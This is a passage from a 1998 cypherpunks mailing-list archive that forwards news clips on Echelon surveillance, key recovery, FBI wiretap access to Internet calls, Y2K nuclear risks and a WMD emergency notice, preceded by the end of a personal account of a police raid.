to get them for the cost of photocopying, and they are VALUABLE.

IN OUR CASE THEY SEALED THE WARRANT THEREBY DENYING ACCESS TO ALL
WHO ASKED.... 

THEY WILL GIVE YOU WHATEVER RECEIPTS THEY FEEL LIKE GIVING YOU....WHEN
THEY PLEASE....


ALL OF THE ABOVE INFORMATION IS ACCURATE AND A MATTER OF COURT RECORD.
WE CHALLENGED THE WARRANTS AND THEY WERE DECLARED ILLEGAL....
WE CHALLENGED THE RAID UNDER TWO SECTIONS OF THE CANADIAN CHARTER, WE
WON....


I THINK WHAT I'M TRYING TO SAY IS "DON'T EXPECT THINGS TO GO DOWN IN A
SMOOTH AND ORGANIZED MANNER, THEIR PEOPLE ARE RUNNING ON ADRENALIN, YOU
ARE UPSET AND NERVOUS, THE HEAD MAN IS TRYING TO IMPRESS HIS MEN,
DON'T BE A HERO, DON'T DO ANYTHING STUPID, LIVE TO FIGHT
ANOTHER DAY.

SORRY FOR DRAGGING ON BUT EVEN AFTER 3.1/2 YEARS THIS EVENT STILL HAS ME
FURIOUS.

JOHN F ST AMOUR







Definition:  FASCISM: n.:  a political and economic movement, strongly nationalistic, magnifying the rights of the state as opposed to those of the individual, in which industry, though remaining largely under private ownership, and all administrative
political units, are controlled by a strong central government.
        -------------------------------------------------
"One of the ordinary modes by which tyrants accomplish their purpose, without resistance, is by disarming the people and making it an offense to keep arms".  - Joseph Story, U.S. Supreme Court Justice.
        -------------------------------------------------
the German gun control laws were enacted by the "liberal" Weimar Republic government that preceded Hitler, and were a strong aid to his coming to power -- because they disarmed Hitler's opponents, and Hitler's adherents ignored them -- as criminals have always ignored gun control laws.

Disarming the public is a frequent first step toward dictatorships and genocides.  Once the disarming is complete, the public is helpless against those who have the guns.        -------------------------------------------------
"Both oligarch and tyrant mistrust the people, and therefore 
 deprive them of their arms."
                                 -- Aristotle, "Politics"
-------------------------------------------------

PGP keys: http://bs.mit.edu:8001/pks-toplev.html
PGP ID:C58ADD0D:529645E8205A8A5E F87CC86FAEFEF891 
PGP ID:5B51964D:152ACCBCD4A481B0 254011193237822C


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Mon, 16 Nov 1998 11:12:33 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Text: Clinton Continues Nat'l Emergency on WMD
Message-ID: <199811160253.SAA00965@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Text: Clinton Continues Nat'l Emergency on WMD
Date: Fri, 13 Nov 1998 01:18:44 -0600
To: believer@telepath.com

Source:  USIA
http://www.usia.gov/current/news/latest/98111212.tlt.html?/products/washfile
/newsitem.shtml

12 November 1998 

TEXT: CLINTON CONTINUES EMERGENCY ON WEAPONS OF MASS
DESTRUCTION 

(They continue to pose an unusual and extraordinary threat) (280)

Washington -- President Clinton November 12 extended the national
emergency regarding weapons of mass destruction that he originally
declared on November 14, 1994 with respect to the unusual and
extraordinary threat to the national security, foreign policy, and
economy of the United States posed by the proliferation of nuclear,
biological, and chemical weapons ("weapons of mass destruction") and
the means of delivering such weapons.

Following is the White House text:

(begin text)

THE WHITE HOUSE
Office of the Press Secretary

November 12, 1999

NOTICE

CONTINUATION OF EMERGENCY REGARDING
WEAPONS OF MASS DESTRUCTION

On November 14, 1994, by Executive Order 12938, I declared a national
emergency with respect to the unusual and extraordinary threat to the
national security, foreign policy, and economy of the United States
posed by the proliferation of nuclear, biological, and chemical
weapons ("weapons of mass destruction") and the means of delivering
such weapons. Because the proliferation of weapons of mass destruction
and the means of delivering them continues to pose an unusual and
extraordinary threat to the national security, foreign policy, and
economy of the United States, the national emergency first declared on
November 14, 1994, and extended on November 14, 1995, November 12,
1996, and November 13, 1997, must continue in effect beyond November
14, 1998. Therefore, in accordance with section 202(d) of the National
Emergencies Act (50 U.S.C. 1622 (d)), I am continuing the national
emergency declared in Executive Order 12938.

This notice shall be published in the Federal Register and transmitted
to the Congress.

WILLIAM J. CLINTON

THE WHITE HOUSE
November 12, 1998

(end text)
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------


****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Mon, 16 Nov 1998 11:10:35 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Stranger than fiction....
Message-ID: <199811160253.SAA00977@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Stranger than fiction....
Date: Fri, 13 Nov 1998 02:09:20 -0600
To: believer@telepath.com

Source:  London Times
http://www.sunday-times.co.uk:80/news/pages/Times/frontpage.html?2182225

Computer bobbies to take over from PCs 

 POLICE in Greater Manchester are to test plans to replace
 some police stations with unstaffed computer kiosks that
 resemble hole-in-the-wall bank machines. 

 People anxious to report an emergency or speak to a
 policeman would use a touch screen to be put through by
 telephone, and eventually by video link, to the nearest
 control room. They would be able to ask the time or receive
 directions electronically, at the touch of the screen. 

 Senior officers believe that the machines, known as customer
 interaction points or communications kiosks, will appear in
 every high street and will become as familiar as cash
 machines and the old blue police boxes. 

 The hole-in- the- wall proposals - which will be tested in
 Salford as part of a plan to reduce the number of police
 stations - grew from a review of the Greater Manchester
 Police force's property as part of a budget crisis. 

 Supporters of the plan insist that the need to cut costs is only
 a means to push through an inevitable and welcome
 technological change which more adequately reflects
 changing police methods. 

 Stuart Render, the force spokesman, said that most people
 reported crime, from burglaries to emergencies, over the
 telephone, and increasingly by mobile phone. They rarely
 needed to go to a police station, except to present
 documents. 

 The kiosks would release money for frontline officers instead
 of tying it up in property. The first machines could be in
 libraries, supermarkets or on the street, he said. 

 "In the future in every high street there will probably be some
 kind of hole-in-the-wall police contact point where you will
 be able to make contact with a 24-hour control room or find
 out things about community safety and so on. That way
 technology gives us flexibility and accessibility to improve our
 level of service and keep officers on the front line rather than
 having them manning police stations." 

 The pilot scheme will be discussed as part of the larger
 rationalisation at a meeting of the Police Authority on Friday.
 Chief Superintendent Chris Wells, Divisional Commander in
 Salford, said: "None of the existing police stations will close
 until replacement facilities have been installed. 

 "The vast majority of people that access our service do not
 visit a police station, they use a telephone. We are looking to
 increase our effectiveness and these proposals together with
 new technology will take us in that direction." 

 He said people would be able to see town centre maps and
 get basic directions from the kiosks, as well as information
 on crime prevention, details about area constables, missing
 persons, Crimestoppers and witness support. 

 Senior officers acknowledge that their biggest problem will
 be persuading a sceptical public of the advantages. Barry
 Evans, the force's director of information technology, is
 aware of the need to "carry a myriad of people" along with
 him and that the machines must prove their worth. 

 Karen Garrido, chairwoman of the Boothstown police and
 community consultative group, based in Salford, is opposed
 to the scheme. Boothstown police station is scheduled to be
 closed within 12 months. 

 She said: "I am totally against the closure. The people should
 be asked what they want and I don't think they will want a
 little box or a hole in the wall instead." 

 A spokesman for Age Concern, which has offices in Eccles,
 Salford, said: "We believe it would be quite daunting for an
 old person who does not have a telephone to leave their
 home and use one of these machines." 

Copyright 1998 Times Newspapers Ltd.
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------


****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Mon, 16 Nov 1998 11:10:24 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Wired News: Y2Kaboom?
Message-ID: <199811160253.SAA00989@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Wired News: Y2Kaboom?
Date: Fri, 13 Nov 1998 02:27:52 -0600
To: believer@telepath.com

Source:  Wired News
http://www.wired.com/news/news/politics/story/16217.html

Y2Kaboom?
 by Declan McCullagh 

 12:27 p.m.12.Nov.98.PST
 WASHINGTON -- America and Russia should
 shut down their nuclear arsenals rather than risk
 Armageddon because of Year 2000 glitches, a
 military research group says in a report released
 Thursday. 

 Y2K errors could cause the systems to go
 haywire, leading to erroneous early warning
 reports or even triggering an accidental launch of
 a nuclear missile, the British American Security
 Information Council warned in a 36-page report. 

 Both superpowers keep their arsenals in a
 constant state of readiness -- a Cold War-era
 strategy that could backfire with devastating
 results if the computer gremlins strike. 

 "If Y2K breakdowns were to produce inaccurate
 early-warning data, or if communications and
 command channels were to be compromised,
 the combination of hair-trigger force postures
 and Y2K failures could be disastrous," said the
 author of "The Bug in the Bomb: The Impact of
 the Year 2000 Problem on Nuclear Weapons." 

 Nuclear weapons systems are laced with
 embedded systems -- controlling functions such
 as ballistics and sensors -- that have not been
 declared free from Y2K worries, the report says.
 Most missles also keep track of time since the
 last monthly or yearly servicing, which could
 transform weapons into plutonium-packed
 paperweights if the systems shut down on 1
 January 2000. 

 A Defense Department official, who spoke on
 condition of anonymity, said nuclear weapons
 systems have received the Pentagon's full
 attention and will be in good shape. He added
 that military leaders are already discussing Y2K
 issues with their Russian counterparts. 

 Those assurances are not enough to allay the
 fears of Michael Kraig, the report's author. 

 "There are two problems together that make up
 one big problem: The sorry state of the
 [Russian] program and the fact that they don't
 know information about it," said Kraig, a BASIC
 fellow. "They're still committed to
 launch-on-warning and hair-trigger alert status.
 That, combined with the fact that their program
 is in such a sorry state, makes us worry." 

 BASIC lobbies for international agreements
 restricting arms sales and supports complete
 nuclear disarmament. 


 The Defense Department has been battling
 accusations that it lags behind other federal
 agencies in making Y2K repairs, something the
 agency's top officials are acutely aware of. 

 "I think we're probably going to be the poster
 child for failure," John Hamre, deputy secretary
 of defense, told Fortune 500 executives in July.
 "Nobody cares if the Park Services computers
 don't come on. OK? But what's going to happen
 if some do in the [Department of Defense]?" 

 The Clinton administration's September quarterly
 report on federal agencies says: "The
 Department of Defense has a massive Year
 2000 challenge which must be accomplished on
 a tight schedule. The Department has improved
 its rate of progress in addressing the challenge,
 but the pace must be increased to meet
 government-wide milestones." 

 The administration's report says that as of this
 summer, 42 percent of the Pentagon's most vital
 systems -- 2,965 in all -- have been Y2K
 cleared. 

 But numbers alone don't reveal the complexity of
 the Defense Department's Y2K woes, Kraig
 argues. 

 "There are severe and recurring problems across
 the entire DOD Y2K remediation program,
 including ill-defined concepts and operating
 procedures, ad-hoc funding and spotty
 estimates for final costs, lax management,
 insufficient standards for declaring systems 'Y2K
 compliant,' insufficient contingency planning in
 case of Y2K-related failures, and poor
 inter-departmental communications," Kraig
 wrote. 

 In the preface, Paul Warnke, BASIC's president
 and chief arms-control negotiator under
 President Carter, says: "The only prudent
 course may be to de-alert those nuclear
 systems where date-related malfunctioning in
 associated command, control, and
 communications systems poses even a remote
 possibility of accidental launch." 

 Copyright (c) 1994-98 Wired Digital Inc. All rights reserved.
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------


****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Mon, 16 Nov 1998 11:16:31 +0800
To: cypherpunks@cyberpass.net
Subject: IP: ISPI Clips 6.37: Privacy Group Pushes For Hearings on ECHELON
Message-ID: <199811160253.SAA01000@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: "Ama-gi ISPI" <Offshore@email.msn.com>
Subject: IP: ISPI Clips 6.37: Privacy Group Pushes For Hearings on ECHELON
Date: Fri, 13 Nov 1998 00:49:50 -0800
To: <Undisclosed.Recipients@majordomo.pobox.com>

ISPI Clips 6.37: Privacy Group Pushes For Hearings on ECHELON
News & Info from the Institute for the Study of Privacy Issues (ISPI)
Friday November 13, 1998
ISPI4Privacy@ama-gi.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This From: WorldNetDaily, November 12, 1998
http://www.worldnetdaily.com

Push for hearings on Echelon:
Global spy system needs scrutiny, says rights group
http://www.worldnetdaily.com/bluesky_exnews/19981112_xex_push_hearing.shtml

A WorldNetDaily Exclusive
Copyright 1998 WorldNetDaily.com

By
Stephan Archer

In an effort to create some accountability between the country's citizens
and the National Security Agency's top-secret global surveillance system
known as Echelon, the Free Congress Foundation is urging that congressional
hearings be held concerning the NSA's use of the system.

Originally, Echelon was designed to spy on the Communist Bloc during the
Cold War. However, since the end of the Cold War, the NSA has used it for
other questionable purposes that include spying on the citizens of U.S.
allies as well as the citizens of other countries, commercial spying, and
even domestic spying.

In essence, Echelon works through a series of high-tech spy facilities
located primarily in five countries: the United States, Canada, England,
New Zealand, and Australia. These countries, which are sworn to secrecy
about the project in a secret agreement known as UKUSA, all actively take
part in this encroachment of privacy into the lives of the people of the
world by collecting virtually all fax transmissions, e-mails, and phone
calls. Not even cellular phone calls escape the grasp of the Echelon
system.

"Obviously, we need to have these capabilities," said Wayne Madsen, who
worked in the National COMSEC Assessment Center at the NSA's Fort Meade,
Maryland, facility back in the 1980s and is currently a senior fellow at
the Electronic Privacy Information Center.

As an example of our country's need for the system, Madsen said, "No one
can argue about using the system to counter terrorism. Where people will
have a problem is where Echelon is used for political and business
interests."

The Echelon system gets most of its data by collecting all transmissions
handled by the Intelsat and Inmarsat satellites, which are responsible for
much of the electronic communication that takes place between countries.
Earth-bound communication is sucked up and absorbed by other spy satellites
that the NSA has launched into space.

"It's a huge vacuum cleaner," said Madsen.

Once these spy facilities collect the phone calls, e-mails, and faxes, of
virtually everyone on earth, the Echelon system sorts them through a kind
of filter system known as the Echelon dictionary. This dictionary looks for
"flag" words in all of the transmitted communication. While it lets a
majority of all collected material pass through its filter, it tags those
that may pose a threat and tracks all subsequent communication coming from
the source of the original "flagged" message.

Concerning Echelon's inherent intrusion on people's privacy, Patrick Poole,
the deputy director for the Center of Technology Policy at the Free
Congress Foundation, said, "While we understand the need for the
intelligence power embodied by Echelon, the indiscriminate use of Echelon
presents major threats to liberty not only to U.S. citizens but to citizens
around the world."

And this threat is real. The foundation's report states that U.S. leaders
have, in fact, already abused this awesome technology. For example, the
report states the following: "In September 1993, President Clinton asked
the CIA to spy on Japanese auto manufacturers that were designing
zero-emission cars and to forward that information to the Big Three U.S.
car manufacturers: Ford, General Motors and Chrysler."

"You can assume that all major U.S. corporations are fed items of interest
(via Echelon) from time to time to give them a leg up on international
competitors," said Madsen.

Although this may be seen as a strategic corporate weapon for American
businesses, in reality, it's an example of technology that can get out of
hand. For example, former Canadian spy Mike Frost stated in his book,
"Spyworld," that in 1981, there was an "accidental" cell phone intercept of
the American ambassador to Canada that resulted in the U.S. getting outbid
by the Canadians in a grain deal with China. The deal brought in $2.5
billion for the Canadian Wheat Board.

With this kind of abuse of Echelon's power, the question as to whether or
not the U.S. government has been using this power for political purposes
can be easily raised. This question is seemingly answered in the
foundation's report.

"The discovery of domestic surveillance targeted at American civilians for
reasons of 'unpopular' political affiliation -- or for no probable cause at
all -- in violation of the First, Fourth and Fifth Amendments of the
Constitution is regularly impeded by very elaborate and complex legal
arguments and privilege claims by the intelligence agencies and the U.S.
government," the report says.

When asked if the system has been used by the U.S. government to spy on its
citizens, Madsen told WorldNetDaily that he was sure it has been.

"I don't believe that the NSA or the current Administration would hesitate
to use this system on American citizens for their own agendas," he said.

Outraged by this flagrant abuse of power illustrated by our country's
elected officials, Poole said, "While the U.S. is the prime mover behind
the Echelon system, it's shameful that the European Parliament is the body
holding the constitutional debate in regards to Echelon today."

A September 1998 report for the European Parliament by the Omega Foundation
said, "Within Europe, all e-mail, telephone, and fax communications are
routinely intercepted by the United States National Security Agency.

According to the Omega Foundation report, it is this ability of the NSA
that brings major concern to the European Parliament. In an effort to bring
the issues surrounding Echelon to the forefront of American politics, the
Free Congress Foundation plans to send out a report about Echelon to all of
the 500 policy organizations in the U.S. as well as to select members of
Congress. These select individuals include members from both the House and
Senate intelligence committees as well as House and Senate Constitution
subcommittees. Copies of the report will also be sent to the congressional
leadership of both parties.

Although the foundation is hoping to get some action out of these members
of Congress, Poole said that support at the grassroots level of our
nation's political structure will be a must if this issue isn't to end up
buried by the intelligence committees.

"For there to be any account and oversight to the Echelon system, the
American people are going to have to contact their elected representatives
in order to investigate the abuses that we know have occurred in regards to
the Echelon system," Poole said.

See Free Congress Foundation's report on Echelon at:
http://www.freecongress.org/ctp/echelon.html


(c) 1998 Western Journalism Center


--------------------------------NOTICE:------------------------------
ISPI Clips are news & opinion articles on privacy issues from
all points of view; they are clipped from local, national and international
newspapers, journals and magazines, etc. Inclusion as an ISPI Clip
does not necessarily reflect an endorsement of the content or opinion
by ISPI. In compliance with Title 17 U.S.C. section 107, this material is
distributed free without profit or payment for non-profit research
and educational purposes only.
---------------------------------------------------------------------------

ISPI Clips is a FREE e-mail service from the "Institute for the Study
of Privacy Issues" (ISPI). To receive "ISPI Clips" on a regular bases
(up to 3 - 8 clips per day) send the following message  "Please
enter [Your Name] into the ISPI Clips list: [Your e-mail address]" to:
ISPIClips@ama-gi.com  .

The Institute for the Study of Privacy Issues (ISPI) is a small
contributor-funded organization based in Victoria, British Columbia
(Canada). ISPI operates on a not-for-profit basis, accepts no
government funding and takes a global perspective.

ISPI's mandate is to conduct & promote interdisciplinary research
into electronic, personal and  financial privacy with a view toward
helping ordinary people understand the degree of privacy they have
with respect to government, industry and each other and to likewise
inform them about techniques to enhance their privacy.

But, none of this can be accomplished without your kind and
generous financial support. If you are concerned about the erosion
of your privacy in general, won't you please help us continue this
important work by becoming an "ISPI Supporter" or by taking out
an institute Membership?

We gratefully accept all contributions:

  Less than $60    ISPI Supporter
          $60 - $99    Primary ISPI Membership (1 year)
      $100 - $300    Senior ISPI Membership (2 years)
More than $300    Executive Council Membership (life)

Your ISPI "membership" contribution entitles you to receive "The ISPI
Privacy Reporter" (our bi-monthly 12 page hard-copy newsletter in
multi-contributor format) for the duration of your membership.

For a contribution form with postal instructions please send the following
message "ISPI Contribution Form" to ISPI4Privacy@ama-gi.com .

We maintain a strict privacy policy. Any information you divulge to ISPI
is kept in strict confidence. It will not be sold, lent or given away to
any third party.












****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Mon, 16 Nov 1998 11:11:57 +0800
To: cypherpunks@cyberpass.net
Subject: IP: ISPI Clips 6.38: NAI [PGP] FlipFlop Back to Pro Key Recovery Group
Message-ID: <199811160253.SAA01011@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: "Ama-gi ISPI" <Offshore@email.msn.com>
Subject: IP: ISPI Clips 6.38: NAI [PGP] FlipFlop Back to Pro Key Recovery Group
Date: Fri, 13 Nov 1998 00:50:46 -0800
To: <Undisclosed.Recipients@majordomo.pobox.com>

ISPI Clips 6.38: NAI [PGP] FlipFlop Back to Pro Key Recovery Group
News & Info from the Institute for the Study of Privacy Issues (ISPI)
Friday November 13, 1998
ISPI4Privacy@ama-gi.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This From: WIRED News, November 12, 1998
http://www.wired.com

NAI Back in Key Recovery Group
http://www.wired.com/news/print_version/technology/story/16219.html?wnpg=al
l

Wired News Report

Computer-security giant Network Associates Inc. has quietly rejoined a
global coalition promoting a controversial technology that could give the
US government access to encrypted data.

Network Associates [ http://www.nai.com/ ], which owns cryptography
software firm PGP and firewall vendor Trusted Information Systems, dropped
out of the Key Recovery Alliance [ http://www.kra.org/ ] last December to
protect the PGP brand, which some civil-liberties advocates say was tainted
by its association with the alliance.

Activists charge that the alliance promotes technology that poses a threat
to civil liberties. The alliance says it is not a lobbying group but does
support the concept of key recovery, a system in which a copy of the secret
key that unlocks scrambled data is placed in escrow.

"We would assume that the acquisition of Trusted Information Systems would
be a contributing factor with the change of that policy," said David Sobel
of the Electronic Privacy Information Center.

"TIS is widely regarded as the originator of the whole concept of key
escrow," Sobel said. Several executives are former employees of the
National Security Agency, which is believed to be a prime advocate of key
recovery in Washington.

Currently, the Clinton administration bars the export of strong encryption
products that do not include a key-recovery component. The policy has long
irked security software companies who see the policy as giving foreign
competition an unfair advantage.

Civil liberties advocates dislike key recovery because they feel it is the
start of a slippery slope toward so-called mandatory key recovery, which
would give the government access to private data.

While the Key Recovery Alliance says it is not a political action committee
or lobbying group, the group is often held up by politicians as an example
of industry support for the administration's policy.

Last December, a Network Associates executive said the Key Recovery
Alliance created a misunderstanding about the company's position on the
issue.

"We want people to understand that Network Associates' position and PGP's
position is to encourage the government and industry to move towards a
policy that allows export of strong cryptography without mandatory key
recovery," Gene Hodges, director of product management at Network
Associates, told Wired News last December.

An attorney with the Center for Democracy and Technology said that Network
Associates opposes mandatory key recovery, but that the company may be
hedging its bets against future shifts in Administration policy.

"There are other companies in the Key Recovery Alliance who are steadfastly
opposed to the administration's policy and mandatory key recovery, yet I
think they are part of the alliance because they feel they need to be,"
said Alan Davidson

Lynn McNulty, director of government affairs for RSA
[ http://www.rsa.com/ ] Data Security, said the company is likely not
expecting negative political fallout, one year after the PGP acquisition.

"The commercial [version of] PGP has kind of been absorbed [into Network
Associate's product line]," McNulty said. "The personal verison kind of
enjoys folklore status among the civil libertarians."

No representative from either Network Associates or the Key Recovery
Alliance was available for comment Thursday.


Related Wired Links:

Another Network Associates U-Turn on Key Recovery? 25.Feb.98
http://www.wired.com/news/news/technology/story/10530.html

Network Associates Disavows Key Recovery Tie: 8.Dec.97
http://www.wired.com/news/news/technology/story/9010.html

Pretty Good Privacy Not Looking So Great: 3.Dec.97
http://www.wired.com/news/news/politics/story/8906.html


Copyright (c) 1994-98 Wired Digital Inc.


--------------------------------NOTICE:------------------------------
ISPI Clips are news & opinion articles on privacy issues from
all points of view; they are clipped from local, national and international
newspapers, journals and magazines, etc. Inclusion as an ISPI Clip
does not necessarily reflect an endorsement of the content or opinion
by ISPI. In compliance with Title 17 U.S.C. section 107, this material is
distributed free without profit or payment for non-profit research
and educational purposes only.
---------------------------------------------------------------------------

ISPI Clips is a FREE e-mail service from the "Institute for the Study
of Privacy Issues" (ISPI). To receive "ISPI Clips" on a regular bases
(up to 3 - 8 clips per day) send the following message  "Please
enter [Your Name] into the ISPI Clips list: [Your e-mail address]" to:
ISPIClips@ama-gi.com  .

The Institute for the Study of Privacy Issues (ISPI) is a small
contributor-funded organization based in Victoria, British Columbia
(Canada). ISPI operates on a not-for-profit basis, accepts no
government funding and takes a global perspective.

ISPI's mandate is to conduct & promote interdisciplinary research
into electronic, personal and  financial privacy with a view toward
helping ordinary people understand the degree of privacy they have
with respect to government, industry and each other and to likewise
inform them about techniques to enhance their privacy.

But, none of this can be accomplished without your kind and
generous financial support. If you are concerned about the erosion
of your privacy in general, won't you please help us continue this
important work by becoming an "ISPI Supporter" or by taking out
an institute Membership?

We gratefully accept all contributions:

  Less than $60    ISPI Supporter
          $60 - $99    Primary ISPI Membership (1 year)
      $100 - $300    Senior ISPI Membership (2 years)
More than $300    Executive Council Membership (life)

Your ISPI "membership" contribution entitles you to receive "The ISPI
Privacy Reporter" (our bi-monthly 12 page hard-copy newsletter in
multi-contributor format) for the duration of your membership.

For a contribution form with postal instructions please send the following
message "ISPI Contribution Form" to ISPI4Privacy@ama-gi.com .

We maintain a strict privacy policy. Any information you divulge to ISPI
is kept in strict confidence. It will not be sold, lent or given away to
any third party.











****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Mon, 16 Nov 1998 11:11:52 +0800
To: cypherpunks@cyberpass.net
Subject: IP: ISPI Clips 6.39: Fed May Give FBI Access to Your Internet Voice Calls & Email.
Message-ID: <199811160253.SAA01023@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: "Ama-gi ISPI" <Offshore@email.msn.com>
Subject: IP: ISPI Clips 6.39: Fed May Give FBI Access to Your Internet Voice Calls & Email.
Date: Fri, 13 Nov 1998 00:51:34 -0800
To: <Undisclosed.Recipients@majordomo.pobox.com>

ISPI Clips 6.39: Fed May Give FBI Access to Your Internet Voice Calls &
Email.
News & Info from the Institute for the Study of Privacy Issues (ISPI)
Friday November 13, 1998
ISPI4Privacy@ama-gi.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This From: CNET news, November 12, 1998
http://www.news.com

Fed mulls wiretap access to Net
http://www.news.com/News/Item/0,4,28695,00.html

By
John Borland, jborland@cnet.com
Staff Writer, CNET News.com

            Federal regulators are struggling over a decision that could
            give the FBI and other law enforcement officials wiretap access
            to Internet voice calls, and possibly access even to the
content
            of data messages such as email.

The Federal Communications Commission [ http://www.fcc.gov/ ] released a
proposal
http://www.fcc.gov/Bureaus/Common_Carrier/Notices/1998/fcc98282.txt ] last
week for implementing the 1994 Communications Assistance for Law
Enforcement Act (CALEA), a measure that requires telephone companies to
provide law enforcement with access to digital call information.
But the report left untouched the issue of whether the FBI
http://www.fbi.gov/ ] would get new powers to tap Net calls. An FCC
staffer, who asked to remain anonymous, said the question of how Net calls
will be treated remains wide open, and may be decided during another round
of public comments.

Congress passed CALEA in 1994, after law enforcement officials complained
that digital technology undermined their ability to tap telephone lines.
The bill was intended to give the FBI and other police agencies the same
access to digital communications, that they already have to traditional
phone lines.

Yet the technological landscape has changed since Congress' action. Voice
transmissions using Internet technologies have moved from hobbyists'
basements and into the corporate mainstream. Companies like Qwest are
building whole business strategies around Net-based telephony, while the
amount of data traffic on public networks has soared.

The FBI wants access to these Net calls, and the leading industry proposal
being reviewed by the FCC allows this. But civil liberties groups warn that
this access goes beyond the original law's bounds, which don't apply well
to Internet communications.

"Congress said very explicitly that the CALEA law was not intended to apply
to Internet communications," said Barry Steinhardt, president of the
Electronic Frontier Foundation. "Over the long term this is the ability to
get packet-switched data, not just voice information."

The sticking point lies in the way that law enforcement gets its power to
tap lines, and in the way that permission fails to translate into the world
of the Internet.

Many people associate a wiretap with a listening post able to overhear the
entire content of a call. This type of tap requires a law enforcement
agency to meet a fairly high standard of evidence, to show it needs access
to a certain phone line.

But the vast majority of wiretaps fall into a category known as "tap and
trace," in which phone companies give up information about a call's origin
and destination without giving officials access to the actual call. This
type of access is much easier for law enforcement officials to obtain, as
they don't require evidence as strong as what is needed for standard
wiretaps.

The "tap-and-trace" system doesn't carry over well to Net calls, which are
broken down and transmitted in individual packets of information. Telephone
company officials say it is impossible, at today's level of technology, for
telephone carriers to hand over the header information in these
packets--which would identify the call's origin and destination--without
also handing over the actual content of the call itself.

"For us it's impossible to do just the one thing," said Grant Seiffert,
vice president of governmental relations for the Telecommunications
Industry Association
[ http://www.tiaonline.org/ ]. "Once you've opened the can of worms, the
whole can stays open."

The EFF, along with the Center for Democracy and Technology (CDT), the
American Civil Liberties Union (ACLU), and the Electronic Privacy
Information Center(EPIC), have lobbied the FCC hard to keep Net calls out
of the wiretapping law for this reason.

"The FBI is saying, 'Trust us, give us the whole message and we'll strip
out the call content,'" Steinhardt said. "We just don't trust them."

For its part, the FBI says it needs access to the Net calls, or criminals
will be able to hide in the telecommunications loophole. Officials have
repeatedly said they will not violate court orders to look at the content
of calls or data messages

The argument doesn't sway civil liberties groups. "If it's not feasible,
the telcos shouldn't have to hand the information over," Steinhardt said.
"[The FBI] shouldn't be given access to information they're not entitled
to."

Comments on the issue of tapping Net calls, as well as the rest of the
FCC's digital wiretapping plan, are due December 14. Telephone companies
are not required to comply with the CALEA provisions until June 30, 2000.


Related news stories
 Dutch ISPs could face wiretap law April 14, 1998
http://www.news.com/News/Item/0,4,21084,00.html?st.ne.ni.rel

 FBI wiretap plan scrutinized February 16, 1998
http://www.news.com/News/Item/0,4,19177,00.html?st.ne.ni.rel

 Dutch ISP won't tap email November 14, 1997
http://www.news.com/News/Item/0,4,16395,00.html?st.ne.ni.rel

 Watchdogs howl at FBI wiretap plans August 11, 1997
http://www.news.com/News/Item/0,4,13264,00.html?st.ne.ni.rel

Copyright (c) 1995-98 CNET, Inc.


--------------------------------NOTICE:------------------------------
ISPI Clips are news & opinion articles on privacy issues from
all points of view; they are clipped from local, national and international
newspapers, journals and magazines, etc. Inclusion as an ISPI Clip
does not necessarily reflect an endorsement of the content or opinion
by ISPI. In compliance with Title 17 U.S.C. section 107, this material is
distributed free without profit or payment for non-profit research
and educational purposes only.
---------------------------------------------------------------------------

ISPI Clips is a FREE e-mail service from the "Institute for the Study
